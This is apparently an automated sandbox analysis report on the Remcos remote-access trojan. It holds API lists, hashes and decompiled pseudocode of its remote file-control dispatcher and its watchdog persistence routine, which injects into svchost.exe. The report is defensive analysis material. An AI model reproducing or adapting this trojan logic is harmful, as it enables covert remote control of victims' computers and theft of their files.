                                    • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Exe$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                                    • API String ID: 1247502528-2513554630
                                    • Opcode ID: 6c05ddb9466eee6198be1ca9077488b9d19deb8e5e98653031aea7da9d79b51b
                                    • Instruction ID: 9c9e9e3c52346475c161a85107fac799350fd5b7d9745b8a93f8e8d1a0230256
                                    • Opcode Fuzzy Hash: 6c05ddb9466eee6198be1ca9077488b9d19deb8e5e98653031aea7da9d79b51b
                                    • Instruction Fuzzy Hash: E732C191F043457BEB9977715C27A7E26CB8B86710F14042FB542AF3D3EEA89D0183A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E0885, Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 006E08A5
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 006E08C3
                                    • RegCloseKey.ADVAPI32(?), ref: 006E08CE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 92a075de183407693654a28d6b2757d8a70b83b69aa7568101ef7663f814f55e
                                    • Instruction ID: a959c7307b7beeb9d681207da06d2add40bb30a060aea27e325dccfec6f7be1b
                                    • Opcode Fuzzy Hash: 92a075de183407693654a28d6b2757d8a70b83b69aa7568101ef7663f814f55e
                                    • Instruction Fuzzy Hash: 81F01D7690020CBFEF209FA09C05FEEBBBDEB04710F1081A6FA04E6151D2795B559BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 006D697D, Relevance: 35.7, APIs: 7, Strings: 13, Instructions: 697COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E006D697D(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v180;
				char _v192;
				void* _v204;
				char _v208;
				char _v212;
				char _v216;
				void* _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				void* _v300;
				void* _v308;
				void* _v312;
				char _v324;
				char _v336;
				char _v344;
				char _v348;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t160;
				signed int _t162;
				void* _t166;
				void* _t171;
				signed int _t172;
				void* _t187;
				void* _t202;
				signed int _t204;
				void* _t218;
				int _t228;
				void* _t235;
				void* _t236;
				void* _t249;
				void* _t256;
				signed int _t261;
				void* _t265;
				void* _t277;
				short* _t288;
				void* _t289;
				void* _t300;
				void* _t316;
				void* _t326;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t340;
				void* _t344;
				void* _t354;
				void* _t356;
				void* _t377;
				void* _t380;
				void* _t542;
				void* _t569;
				intOrPtr _t574;
				intOrPtr _t575;
				signed int _t576;
				signed int _t578;
				signed int _t581;
				void* _t588;
				void* _t590;
				void* _t592;
				void* _t594;
				void* _t596;
				signed int _t597;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t605;
				void* _t606;
				void* _t609;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t618;
				void* _t620;
				void* _t639;
				void* _t640;
				void* _t641;
				void* _t642;
				void* _t645;
				void* _t647;

				_t646 = __eflags;
				_t550 = __edx;
				_push(_t356);
				_t574 = _a4;
				_push(_t569);
				E006D20EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
				SetEvent( *(_t574 + 0x34));
				_t575 =  *((intOrPtr*)(E006D1F95( &_v160)));
				E006D42A6( &_v160,  &_v136, 4, 0xffffffff);
				_t600 = (_t597 & 0xfffffff8) - 0xec;
				E006D20EC(0x73c238, _t600, _t550, _t646, 0x73c238);
				_t601 = _t600 - 0x18;
				E006D20EC(0x73c238, _t601, _t550, _t646,  &_v152);
				E006E7478( &_v288, _t550);
				_t602 = _t601 + 0x30;
				_t647 = _t575 - 0x8b;
				if(_t647 > 0) {
					_t576 = _t575 - 0x8c;
					__eflags = _t576;
					if(__eflags == 0) {
						E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
						_t160 = GetFileAttributesW(E006D1EEB( &_v260));
						__eflags = _t160 & 0x00000010;
						if((_t160 & 0x00000010) == 0) {
							_t162 = DeleteFileW(E006D1EEB( &_v260));
						} else {
							_t162 = E006E7754(E006D1EEB( &_v260));
						}
						__eflags = _t162;
						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
						if(__eflags == 0) {
							_t603 = _t602 - 0x18;
							E006E739C(0x73c238, _t603,  &_v252);
							_push(0x55);
							E006D4AA4(0x73c238, 0x73c2e8,  &_v252, __eflags);
							_t166 = E006E733B( &_v208,  &_v280);
							_t604 = _t603 - 0x18;
							_t553 = "Unable to delete: ";
							E006D75C2(0x73c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
							_t605 = _t604 - 0x14;
							_t377 = _t605;
							_push("[ERROR]");
						} else {
							_t187 = E006E733B( &_v180,  &_v252);
							_t609 = _t602 - 0x18;
							_t553 = "Deleted file: ";
							E006D75C2(0x73c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
							_t605 = _t609 - 0x14;
							_t377 = _t605;
							_push("[Info]");
						}
						E006D2084(0x73c238, _t377);
						E006E6C80(0x73c238, _t569);
						_t606 = _t605 + 0x30;
						E006D1FC7();
						_t171 = E006D1E49( &_v288, _t553, __eflags, 1);
						_t550 = "1";
						_t380 = _t171;
						_t172 = E006D5A6F("1");
						__eflags = _t172;
						if(_t172 == 0) {
							L40:
							E006D1EF0();
							L41:
							E006D1E74( &_v284, _t550);
							E006D1FC7();
							E006D1FC7();
							return 0;
						} else {
							__eflags = E006D7323( &_v272, _t380, _t380) + 1;
							E006D733F(E006D7323( &_v272, _t380, _t380) + 1);
							_t550 =  &_v284;
							E006D1EFA( &_v284,  &_v284, _t576, E006D2FFA(0x73c238,  &_v212,  &_v284, 0x2a));
							E006D1EF0();
							E006D427F(0x73c238, _t606 - 0x18, E006D1EEB( &_v288));
							L39:
							E006D61C3();
							goto L40;
						}
					}
					_t578 = _t576 - 1;
					__eflags = _t578;
					if(__eflags == 0) {
						E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
						E006D427F(0x73c238,  &_v216, E006D1F95(E006D1E49( &_v272, _t550, __eflags, 1)));
						E006D7309( &_v276,  &_v252, 0, E006D7323( &_v268,  &_v216,  &_v216) + 1);
						_t202 = E006D1EEB(E006D7629( &_v216,  &_v264,  &_v240));
						_t204 = E00709924(E006D1EEB( &_v288), _t202);
						asm("sbb bl, bl");
						E006D1EF0();
						_t361 =  ~_t204 + 1;
						__eflags =  ~_t204 + 1;
						if(__eflags == 0) {
							_t550 = E006D75E6( &_v180, "Unable to rename file!", __eflags, 0x73c238);
							E006D5343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
							_push(0x59);
							E006D4AA4(_t361, 0x73c2e8, _t206, __eflags);
							E006D1FC7();
						} else {
							_t550 =  &_v228;
							E006D7514(_t602 - 0x18,  &_v228, __eflags, "*");
							E006D61C3();
						}
						E006D1EF0();
						L13:
						E006D1EF0();
						goto L40;
					}
					_t581 = _t578 - 1;
					__eflags = _t581;
					if(__eflags == 0) {
						E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
						_t218 = E006D1F95(E006D1E49( &_v272, _t550, __eflags, 1));
						_t550 =  &_v264;
						CreateDirectoryW(E006D1EEB(E006D7514( &_v192,  &_v264, __eflags, _t218)), 0);
						E006D1EF0();
						E006D3300(0x2a);
						E006D7350(0x73c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t583 = _t581 - 3;
					__eflags = _t581 - 3;
					if(__eflags == 0) {
						_t228 = StrToIntA(E006D1F95(E006D1E49( &_v264, _t550, __eflags, _t583)));
						_t550 = E006D1F95(E006D1E49( &_v268, _t550, __eflags, 1));
						E006E7F10(_t228, _t230);
					}
					goto L41;
				}
				if(_t647 == 0) {
					E006D20D5(0x73c238,  &_v180);
					E006D484E(0x73c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E006D4A08(_t550);
					_t235 = E006D1E49( &_v284, _t550, __eflags, 3);
					_t614 = _t602 - 0xfffffffffffffff8;
					_t236 = E006D1E49( &_v288, _t550, __eflags, 2);
					E006D2F93(0x73c238, _t614, E006D2F93(0x73c238,  &_v236, E006D2F93(0x73c238,  &_v260, E006D2FB7( &_v284, E006D1E49( &_v292, _t550, __eflags, 1), 0x73c238), __eflags, _t236), __eflags, 0x73c238), __eflags, _t235);
					E006D4AA4(0x73c238,  &_v140, _t240, __eflags);
					E006D1FC7();
					E006D1FC7();
					E006D1FC7();
					E006D427F(0x73c238,  &_v292, E006D1F95(E006D1E49( &_v324, _t240, __eflags, 0)));
					_t249 = E006E733B( &_v272,  &_v296);
					_t615 = _t614 - 0x18;
					E006D75C2(0x73c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
					_t616 = _t615 - 0x14;
					E006D2084(0x73c238, _t616, "[Info]");
					E006E6C80(0x73c238, "[Info]");
					E006D1FC7();
					E006D1EF0();
					_t256 = E006D1F95(E006D1E49( &_v336, "Downloading file: ", __eflags, 0));
					_t618 = _t616 + 0x30 - 0x18;
					E006D427F(0x73c238, _t618, _t256);
					_t261 = E006D62D8( &_v192, __eflags, E007098A0(_t258, E006D1F95(E006D1E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t620 = _t618 + 0x2c;
					_push(0);
					__eflags = _t261;
					if(__eflags == 0) {
						E006D427F(0x73c238,  &_v264, E006D1F95(E006D1E49( &_v348, "Downloading file: ", __eflags)));
						_t265 = E006E733B( &_v244,  &_v268);
						_t550 = "Failed to download file: ";
						E006D75C2(0x73c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
						E006D2084(0x73c238, _t620 - 4, "[ERROR]");
						E006E6C80(0x73c238, "[Info]");
						E006D1FC7();
						E006D1EF0();
					} else {
						E006D427F(0x73c238,  &_v264, E006D1F95(E006D1E49( &_v348, "Downloading file: ", __eflags)));
						_t277 = E006E733B( &_v244,  &_v268);
						_t550 = "Downloaded file: ";
						E006D75C2(0x73c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
						E006D2084(0x73c238, _t620 - 4, "[Info]");
						E006E6C80(0x73c238, "[Info]");
						E006D1FC7();
						E006D1EF0();
						E006D2084(0x73c238, _t620 - 4 + 0x30 - 0x18, 0x72f6bc);
						_push(0x58);
						E006D4AA4(0x73c238,  &_v156, "Downloaded file: ", __eflags);
					}
					E006D4E0B( &_v140);
					E006D4E2F(0x73c238,  &_v140, 0);
					L15:
					E006D1FC7();
					goto L41;
				}
				_t588 = _t575 - 0x61;
				if(_t588 == 0) {
					E006D427F(0x73c238, _t602 - 0x18, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
					_t288 = E006D1E49( &_v272, _t550, __eflags, 2);
					_t289 = E006D1E49( &_v276, _t550, __eflags, 1);
					_t550 = _t288;
					E006E69CC(_t289, _t288);
					goto L41;
				}
				_t590 = _t588 - 0x26;
				if(_t590 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E006D20AB(0x73c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
					__eflags = E006D7397( &_v260, 0x72f860, 0, 2) + 1;
					E006D1F84(E006D7397( &_v260, 0x72f860, 0, 2) + 1);
					E006D20EC(0x73c238, _t602 - 0x18, _t550, E006D7397( &_v260, 0x72f860, 0, 2) + 1,  &_v276);
					_t300 = E006D6406(0x73c238,  &_v256);
					_t550 = E006D2FB7( &_v232,  &_v280, 0x73c238);
					E006D2F1D(_t602 - 0x18, _t301, _t300);
					_push(0x51);
					E006D4AA4(0x73c238, 0x73c2e8, _t301, __eflags);
					E006D1FC7();
					E006D1FC7();
					goto L15;
				}
				_t592 = _t590 - 1;
				if(_t592 == 0) {
					E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
					E006D7350(0x73c238, _t602 - 0x18, _t550, __eflags,  &_v260);
					E006D61C3();
					__eflags = E006D2489() - 2;
					_t316 = E006E733B( &_v228, E006D7309( &_v264,  &_v240, 0, E006D2489() - 2));
					_t550 = "Browsing directory: ";
					E006D75C2(0x73c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E006D2489() - 2, _t316);
					E006D2084(0x73c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
					E006E6C80(0x73c238, _t569);
					E006D1FC7();
					goto L13;
				}
				_t594 = _t592 - 1;
				if(_t594 == 0) {
					E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
					ShellExecuteW(0, L"open", E006D1EEB( &_v260), 0, 0, 1);
					_t326 = E006E733B( &_v212,  &_v260);
					_t550 = "Executing file: ";
					E006D75C2(0x73c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
					E006D2084(0x73c238, _t602 - 4, "[Info]");
					E006E6C80(0x73c238, _t569);
					E006D1FC7();
					goto L40;
				} else {
					_t596 = _t594 - 1;
					_t652 = _t596;
					if(_t596 == 0) {
						E006D72F6( &_v108);
						_t332 = E006D1E49( &_v264, _t550, _t652, 3);
						_t639 = _t602 - 0x18;
						E006D20EC(0x73c238, _t639, _t550, _t652, _t332);
						_t334 = E006D1E49( &_v272, _t550, _t652, 2);
						_t640 = _t639 - 0x18;
						E006D20EC(0x73c238, _t640, _t550, _t652, _t334);
						_t336 = E006D1E49( &_v280, _t550, _t652, 1);
						_t641 = _t640 - 0x18;
						E006D20EC(0x73c238, _t641, _t550, _t652, _t336);
						_push(E006D1F95(E006D1E49( &_v288, _t550, _t652, _t596)));
						_t340 = E006D64A2( &_v136, _t550);
						_push(_t596);
						_t653 = _t340;
						if(_t340 == 0) {
							E006D427F(0x73c238,  &_v252, E006D1F95(E006D1E49( &_v368, _t550, __eflags)));
							_t344 = E006E733B( &_v232,  &_v256);
							_t642 = _t641 - 0x18;
							_t550 = "Failed to upload file: ";
							E006D75C2(0x73c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
							_t542 = _t642 - 0x14;
							_push("[ERROR]");
						} else {
							E006D427F(0x73c238,  &_v252, E006D1F95(E006D1E49( &_v368, _t550, _t653)));
							_t354 = E006E733B( &_v232,  &_v256);
							_t645 = _t641 - 0x18;
							_t550 = "Uploaded file: ";
							E006D75C2(0x73c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
							_t542 = _t645 - 0x14;
							_push("[Info]");
						}
						E006D2084(0x73c238, _t542);
						E006E6C80(0x73c238, _t569);
						E006D1FC7();
						E006D1EF0();
						L006D7304(0x73c238,  &_v132, _t596);
					}
					goto L41;
				}
			}
















































































































                                    0x006d697d
                                    0x006d697d
                                    0x006d698d
                                    0x006d698f
                                    0x006d6992
                                    0x006d6997
                                    0x006d699f
                                    0x006d69b9
                                    0x006d69c3
                                    0x006d69c8
                                    0x006d69d3
                                    0x006d69d8
                                    0x006d69e5
                                    0x006d69ee
                                    0x006d69f8
                                    0x006d69fb
                                    0x006d69fd
                                    0x006d6fad
                                    0x006d6fad
                                    0x006d6fb3
                                    0x006d7198
                                    0x006d71a7
                                    0x006d71b1
                                    0x006d71b3
                                    0x006d71c9
                                    0x006d71b5
                                    0x006d71bc
                                    0x006d71bc
                                    0x006d71cf
                                    0x006d71d8
                                    0x006d71da
                                    0x006d7201
                                    0x006d7206
                                    0x006d720b
                                    0x006d7212
                                    0x006d721f
                                    0x006d7224
                                    0x006d7227
                                    0x006d722f
                                    0x006d7234
                                    0x006d7237
                                    0x006d7239
                                    0x006d71dc
                                    0x006d71e0
                                    0x006d71e5
                                    0x006d71e8
                                    0x006d71f0
                                    0x006d71f5
                                    0x006d71f8
                                    0x006d71fa
                                    0x006d71fa
                                    0x006d723e
                                    0x006d7243
                                    0x006d7248
                                    0x006d724f
                                    0x006d725a
                                    0x006d725f
                                    0x006d7264
                                    0x006d7266
                                    0x006d726b
                                    0x006d726d
                                    0x006d72c4
                                    0x006d72c8
                                    0x006d72cd
                                    0x006d72d1
                                    0x006d72dd
                                    0x006d72e6
                                    0x006d72f3
                                    0x006d726f
                                    0x006d727a
                                    0x006d7280
                                    0x006d7287
                                    0x006d729a
                                    0x006d72a3
                                    0x006d72b7
                                    0x006d72bc
                                    0x006d72bc
                                    0x00000000
                                    0x006d72c1
                                    0x006d726d
                                    0x006d6fb9
                                    0x006d6fb9
                                    0x006d6fbc
                                    0x006d7097
                                    0x006d70b3
                                    0x006d70cf
                                    0x006d70e9
                                    0x006d70f9
                                    0x006d7108
                                    0x006d710a
                                    0x006d710f
                                    0x006d710f
                                    0x006d7112
                                    0x006d7150
                                    0x006d7154
                                    0x006d715a
                                    0x006d7161
                                    0x006d716a
                                    0x006d7114
                                    0x006d7117
                                    0x006d7122
                                    0x006d7128
                                    0x006d712d
                                    0x006d7173
                                    0x006d6c5f
                                    0x006d6c5f
                                    0x00000000
                                    0x006d6c5f
                                    0x006d6fc2
                                    0x006d6fc2
                                    0x006d6fc5
                                    0x006d7022
                                    0x006d7035
                                    0x006d703b
                                    0x006d7051
                                    0x006d705b
                                    0x006d7066
                                    0x006d7075
                                    0x00000000
                                    0x006d7075
                                    0x006d6fc7
                                    0x006d6fc7
                                    0x006d6fca
                                    0x006d6fe2
                                    0x006d6ffc
                                    0x006d7000
                                    0x006d7000
                                    0x00000000
                                    0x006d6fca
                                    0x006d6a03
                                    0x006d6d53
                                    0x006d6d61
                                    0x006d6d77
                                    0x006d6d78
                                    0x006d6d79
                                    0x006d6d7a
                                    0x006d6d7b
                                    0x006d6d86
                                    0x006d6d8b
                                    0x006d6d98
                                    0x006d6dd2
                                    0x006d6de1
                                    0x006d6dea
                                    0x006d6df3
                                    0x006d6dfc
                                    0x006d6e19
                                    0x006d6e26
                                    0x006d6e2b
                                    0x006d6e36
                                    0x006d6e3b
                                    0x006d6e46
                                    0x006d6e4b
                                    0x006d6e57
                                    0x006d6e60
                                    0x006d6e71
                                    0x006d6e76
                                    0x006d6e7c
                                    0x006d6ea8
                                    0x006d6ead
                                    0x006d6eb4
                                    0x006d6eb5
                                    0x006d6eb7
                                    0x006d6f41
                                    0x006d6f4e
                                    0x006d6f56
                                    0x006d6f5e
                                    0x006d6f6d
                                    0x006d6f72
                                    0x006d6f7e
                                    0x006d6f87
                                    0x006d6eb9
                                    0x006d6eca
                                    0x006d6ed7
                                    0x006d6edf
                                    0x006d6ee7
                                    0x006d6ef2
                                    0x006d6ef7
                                    0x006d6f03
                                    0x006d6f0c
                                    0x006d6f1b
                                    0x006d6f20
                                    0x006d6f29
                                    0x006d6f29
                                    0x006d6f93
                                    0x006d6f9f
                                    0x006d6cff
                                    0x006d6cff
                                    0x00000000
                                    0x006d6cff
                                    0x006d6a09
                                    0x006d6a0c
                                    0x006d6d21
                                    0x006d6d2c
                                    0x006d6d39
                                    0x006d6d3e
                                    0x006d6d42
                                    0x00000000
                                    0x006d6d47
                                    0x006d6a12
                                    0x006d6a15
                                    0x006d6c73
                                    0x006d6c87
                                    0x006d6c9e
                                    0x006d6ca4
                                    0x006d6cb3
                                    0x006d6cbc
                                    0x006d6cd3
                                    0x006d6cd7
                                    0x006d6cdd
                                    0x006d6ce4
                                    0x006d6ced
                                    0x006d6cf6
                                    0x00000000
                                    0x006d6cfb
                                    0x006d6a1b
                                    0x006d6a1e
                                    0x006d6be8
                                    0x006d6bf7
                                    0x006d6bfc
                                    0x006d6c0d
                                    0x006d6c26
                                    0x006d6c2e
                                    0x006d6c36
                                    0x006d6c45
                                    0x006d6c4a
                                    0x006d6c56
                                    0x00000000
                                    0x006d6c5b
                                    0x006d6a24
                                    0x006d6a27
                                    0x006d6b6f
                                    0x006d6b88
                                    0x006d6b96
                                    0x006d6b9e
                                    0x006d6ba6
                                    0x006d6bb5
                                    0x006d6bba
                                    0x006d6bc6
                                    0x00000000
                                    0x006d6a2d
                                    0x006d6a2d
                                    0x006d6a2d
                                    0x006d6a30
                                    0x006d6a3d
                                    0x006d6a48
                                    0x006d6a4d
                                    0x006d6a53
                                    0x006d6a5e
                                    0x006d6a63
                                    0x006d6a69
                                    0x006d6a74
                                    0x006d6a79
                                    0x006d6a7f
                                    0x006d6a95
                                    0x006d6a9d
                                    0x006d6aa6
                                    0x006d6aa7
                                    0x006d6aa9
                                    0x006d6afb
                                    0x006d6b08
                                    0x006d6b0d
                                    0x006d6b10
                                    0x006d6b18
                                    0x006d6b20
                                    0x006d6b22
                                    0x006d6aab
                                    0x006d6abc
                                    0x006d6ac9
                                    0x006d6ace
                                    0x006d6ad1
                                    0x006d6ad9
                                    0x006d6ae1
                                    0x006d6ae3
                                    0x006d6ae3
                                    0x006d6b27
                                    0x006d6b2c
                                    0x006d6b38
                                    0x006d6b41
                                    0x006d6b4d
                                    0x006d6b4d
                                    0x00000000
                                    0x006d6a30

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 006D699F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 006D6B88
                                      • Part of subcall function 006D64A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006D64ED
                                      • Part of subcall function 006D62D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 006D6331
                                      • Part of subcall function 006D62D8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 006D6379
                                      • Part of subcall function 006D62D8: CloseHandle.KERNEL32(00000000), ref: 006D63B3
                                      • Part of subcall function 006D62D8: MoveFileW.KERNEL32(00000000,00000000), ref: 006D63CB
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                    • GetLogicalDriveStringsA.KERNEL32 ref: 006D6C73
                                    • StrToIntA.SHLWAPI(00000000,?), ref: 006D6FE2
                                    • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 006D7051
                                      • Part of subcall function 006D61C3: FindFirstFileW.KERNEL32(00000000,?), ref: 006D61DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
                                    • API String ID: 4189642951-1986272625
                                    • Opcode ID: 9e7b3e93434ad678ce09fa0584ec95d750407149775d47cf25e9e3801a3501ad
                                    • Instruction ID: 00046d5efb4415f55763643f3600f0851f6e7bbe430197b0fde0ac0b83abb88d
                                    • Opcode Fuzzy Hash: 9e7b3e93434ad678ce09fa0584ec95d750407149775d47cf25e9e3801a3501ad
                                    • Instruction Fuzzy Hash: 42328771E083416BC684FB75D8679AF77A79F95300F40092EF4425B392EE709A09C79B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DFAC7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E006DFAC7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E006E0BB0(0x73c518, E006D1F95(0x73c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E006D20D5(0x73c518,  &_v100);
						E006E79DC(E006D1EEB(0x73c500),  &_v100);
						E006D1F6D(0x73c518,  &_v124);
						__eflags = E006E7614( &_v124);
						if(__eflags != 0) {
							_t35 = E006D427F(0x73c518,  &_v76, L"\\SysWOW64");
							E006D1EFA( &_v132, _t37, _t142, E006D3030( &_v36, E006D427F(0x73c518,  &_v56, E0070987F(0x73c518,  &_v76, __eflags, L"WinDir")), _t35));
							E006D1EF0();
							E006D1EF0();
						} else {
							_t61 = E006D427F(0x73c518,  &_v28, L"\\system32");
							E006D1EFA( &_v132, _t63, _t142, E006D3030( &_v84, E006D427F(0x73c518,  &_v56, E0070987F(0x73c518,  &_v28, __eflags, L"WinDir")), _t61));
							E006D1EF0();
							E006D1EF0();
						}
						E006D1EF0();
						E006D766C(0x73c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = E006D1F95( &_v104);
						_t46 = E006E412B(E006D1EEB( &_v128), _t143, 0x73bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E006D2084(0x73c518, _t107, "Watchdog module activated");
							E006D2084(0x73c518, _t150 - 0x18, "[Info]");
							E006E6C80(0x73c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x73bd58; // 0x0
							goto L13;
						}
						E006D2084(0x73c518, _t107, "Watchdog launch failed!");
						E006D2084(0x73c518, _t150 - 0x18, "[ERROR]");
						E006E6C80(0x73c518, 0);
						CloseHandle( *0x73bd60);
						E006D1EF0();
						E006D1FC7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E006D2084(0x73c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E006D2084(0x73c518, _t155 - 0x18, "[Info]");
						E006E6C80(0x73c518, 0);
						E006D2084(0x73c518, _t156 + 0x18, "Watchdog module activated");
						E006D2084(0x73c518, _t156 + 0x18 - 0x18, "[Info]");
						E006E6C80(0x73c518, 0);
						CreateThread(0, 0, E006E00F9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E006E0885(E006D1F95(0x73c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x73bd50 = OpenProcess(0x1fffff, 0, _v132);
							E006E0CE2(E006D1F95(0x73c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x73bd4e;
							if(__eflags != 0) {
								E006DFAC7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}





































                                    0x006dfacd
                                    0x006dfad1
                                    0x006dfad3
                                    0x006dfaf6
                                    0x006dfb0d
                                    0x006dfb13
                                    0x006dfb15
                                    0x006dfba4
                                    0x006dfbb9
                                    0x006dfbc2
                                    0x006dfbcc
                                    0x006dfbce
                                    0x006dfc2b
                                    0x006dfc57
                                    0x006dfc60
                                    0x006dfc69
                                    0x006dfbd0
                                    0x006dfbd9
                                    0x006dfc05
                                    0x006dfc0e
                                    0x006dfc17
                                    0x006dfc1c
                                    0x006dfc72
                                    0x006dfc80
                                    0x006dfc97
                                    0x006dfca2
                                    0x006dfca8
                                    0x006dfcab
                                    0x006dfcad
                                    0x006dfcaf
                                    0x006dfcb6
                                    0x006dfcc5
                                    0x006dfcca
                                    0x006dfcd7
                                    0x006dfcdd
                                    0x00000000
                                    0x006dfcdd
                                    0x006dfcea
                                    0x006dfcf9
                                    0x006dfcfe
                                    0x006dfd0c
                                    0x006dfd16
                                    0x006dfd1f
                                    0x006dfd24
                                    0x006dfd26
                                    0x006dfb1b
                                    0x006dfb1c
                                    0x006dfb22
                                    0x006dfb2c
                                    0x006dfb31
                                    0x006dfb3c
                                    0x006dfb41
                                    0x006dfb50
                                    0x006dfb5b
                                    0x006dfb60
                                    0x006dfb72
                                    0x006dfb7c
                                    0x006dfb8c
                                    0x006dfb93
                                    0x006dfb95
                                    0x00000000
                                    0x006dfb9b
                                    0x006dfd43
                                    0x006dfd4f
                                    0x006dfd55
                                    0x006dfd59
